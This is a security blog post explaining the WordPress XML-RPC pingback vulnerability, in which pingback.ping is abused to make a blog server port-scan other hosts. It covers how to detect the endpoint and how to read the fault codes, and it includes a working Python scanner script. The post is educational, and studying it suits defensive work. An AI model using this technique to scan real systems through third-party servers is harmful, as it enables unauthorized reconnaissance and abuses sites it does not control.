WordPress XML-RPC Pingback Vulnerability
Hi all! Today I am going to talk about the WordPress XML-RPC Pingback vulnerability.
Using this vulnerability we can make the WordPress server perform a port scan of hosts on its intranet or on the Internet. Before that, let's start with a quick description:
What is a Pingback?
A pingback is one of three types of linkbacks, methods for Web authors to request notification when somebody links to one of their documents. This enables authors to keep track of who is linking to, or referring to their articles. Some weblog software, such as Movable Type, Serendipity, WordPress, and Telligent Community, support automatic pingbacks where all the links in a published article can be pinged when the article is published.
What is XML-RPC?
XML-RPC is a remote procedure call (RPC) protocol which uses XML to encode its calls and HTTP as a transport mechanism. "XML-RPC" also refers generically to the use of XML for remote procedure calls, independently of the specific protocol.
WordPress has an XML-RPC API that is exposed through the "xmlrpc.php" file. One of the methods exposed through this API is "pingback.ping", with which other blogs announce pingbacks: the caller passes the URL of the page that contains the link (the source) and the URL of the local post it links to (the target), and WordPress then fetches the source URL itself to verify that the link really exists. That server-side fetch is what we are going to abuse.
(Note: The latest version of WordPress, version 3.5, was released on December 11, 2012. It comes with the XML-RPC interface enabled by default.)
We can easily determine whether the XML-RPC API is running on a WordPress site by requesting the default location, "xmlrpc.php", in the site root. A plain GET to it answers with a short message that the XML-RPC server accepts POST requests only, which already tells us the endpoint is there.
Let's go further and check whether the XML-RPC service is actually working by sending it a simple XML request.
(Note: WordPress's XML-RPC server includes a couple of demo methods that we can use to test the functionality. We are going to demonstrate a simple 'demo.sayHello' request, which a working endpoint answers with the string "Hello!".)
Now that we know the XML-RPC interface is available and functioning properly, we can try to take advantage of the pingback API. We send a crafted pingback.ping request whose source URL points at the host and port we want to probe; the vulnerable server then tries to connect to that host and port and reports back, through its fault code, whether it could. The crafted request for the port scan is given below.
In the request above,
Target is the URL (host and port) the attacker wants to scan. It goes in the first parameter, the pingback source.
ValidPostlink is a post published on the vulnerable WordPress site. It goes in the second parameter, the pingback target, and must point at a real, pingback-enabled local post: pingback.ping checks this first and refuses the call with fault 33 before fetching anything if it does not.
So let's send this request to the vulnerable XML-RPC service.
In the above case the XML response carries faultCode 16 ("The source URL does not exist."): WordPress could not fetch the source URL, so port 22 on the target is closed. Note that any failed connection, including a filtered port or a timeout, produces the same code.
In the above case the XML response carries faultCode 17 ("The source URL does not contain a link to the target URL"): WordPress connected, read a response and found no link back to the post, so port 80 on the target is open.
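The demo.sayHello check and the pingback.ping port probe described above, written out as an added Python example (this is not the original post's Ruby script nor WordPress code). The blog endpoint, the post URL and the scanned host 10.0.0.5 are assumed placeholders; the responses used for the offline demonstration are constructed in the shape xmlrpc.php returns, not captured from a real server.

```python
# Added example (not the original post's Ruby script): build the XML-RPC requests
# described above and turn the pingback.ping fault codes into port states.
import xmlrpc.client
from urllib.request import Request, urlopen

# Assumed names: the vulnerable blog's endpoint and one published post on it.
XMLRPC_ENDPOINT = "http://blog.example/xmlrpc.php"
VALID_POST_LINK = "http://blog.example/2012/12/hello-world/"

# pingback.ping fault codes as returned by WordPress's XML-RPC server
PINGBACK_FAULTS = {
    16: "closed",    # "The source URL does not exist." -> fetch failed (refused, filtered, timeout)
    17: "open",      # "...does not contain a link to the target URL" -> fetch worked, port answered
    33: "bad-post",  # target URL is not a local, pingback-enabled post: fix ValidPostlink
}


def xmlrpc_call(method, *params):
    """Serialize a methodCall with the stdlib encoder (returns bytes for the POST body)."""
    return xmlrpc.client.dumps(params, methodname=method).encode()


def say_hello_request():
    """The demo.sayHello probe: a working endpoint answers with the string 'Hello!'."""
    return xmlrpc_call("demo.sayHello")


def pingback_request(target_host, port, valid_post_link=VALID_POST_LINK):
    """pingback.ping(source, target): source is the host:port we want WordPress to
    connect to, target is the local post that makes the request pass validation."""
    source = f"http://{target_host}:{port}/"
    return xmlrpc_call("pingback.ping", source, valid_post_link)


def classify_response(body):
    """Map an xmlrpc.php response body to 'open', 'closed', or a description of the answer."""
    try:
        values, _method = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        return PINGBACK_FAULTS.get(fault.faultCode, f"fault {fault.faultCode}: {fault.faultString}")
    return f"ok: {values[0]!r}"  # a normal (non-fault) answer, e.g. 'Hello!'


def post(endpoint, body, timeout=30):
    """Send one XML-RPC call. The server has to fetch the source URL itself, so allow it time."""
    req = Request(endpoint, data=body, headers={"Content-Type": "text/xml"}, method="POST")
    with urlopen(req, timeout=timeout) as resp:
        return resp.read()


def scan(target_host, ports, endpoint=XMLRPC_ENDPOINT, valid_post_link=VALID_POST_LINK):
    """Port-scan target_host through the WordPress server, one pingback.ping call per port."""
    return {p: classify_response(post(endpoint, pingback_request(target_host, p, valid_post_link)))
            for p in ports}


# Constructed responses in the shape xmlrpc.php returns, so the parser can be
# exercised offline (these are not captured from a real server).
def sample_fault(code, text):
    return f"""<?xml version="1.0"?>
<methodResponse>
  <fault>
    <value>
      <struct>
        <member><name>faultCode</name><value><int>{code}</int></value></member>
        <member><name>faultString</name><value><string>{text}</string></value></member>
      </struct>
    </value>
  </fault>
</methodResponse>""".encode()


SAMPLE_CLOSED = sample_fault(16, "The source URL does not exist.")
SAMPLE_OPEN = sample_fault(17, "The source URL does not contain a link to the target URL, and so cannot be used as a source.")
SAMPLE_HELLO = b"""<?xml version="1.0"?>
<methodResponse>
  <params>
    <param><value><string>Hello!</string></value></param>
  </params>
</methodResponse>"""

if __name__ == "__main__":
    print(pingback_request("10.0.0.5", 22).decode())
    for name, body in ("demo.sayHello", SAMPLE_HELLO), ("port 22", SAMPLE_CLOSED), ("port 80", SAMPLE_OPEN):
        print(name, "->", classify_response(body))
    # Live use (needs network access and a site that still exposes the behaviour):
    # print(scan("10.0.0.5", [22, 80, 443]))
```

Only the fault code is used to decide the state, so a non-HTTP service that accepts the connection but makes WordPress's HTTP client give up will also show up as "closed"; watching the response time of each call is the usual way to tell a refused connection from a timeout.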
By interfacing with the API an attacker can cause the WordPress site to port scan an external target and return the results. Using a small Ruby script we were able to run a port scan on an external target from the affected WordPress server (Metasploit has a module for this, named "WordPress Pingback PortScanner").
Using the XML-RPC feature, an attacker can scan other hosts on the intranet or the Internet via the affected server. Note that later WordPress releases pass the pingback source URL through wp_http_validate_url() before fetching it, which rejects loopback and RFC 1918 private addresses, so the intranet part of this technique does not work out of the box against an up-to-date site; the server will still happily fetch public URLs on the attacker's behalf.
Thanks!! Please comment below; feedback is always welcome.
Happy Bounty Hunting !!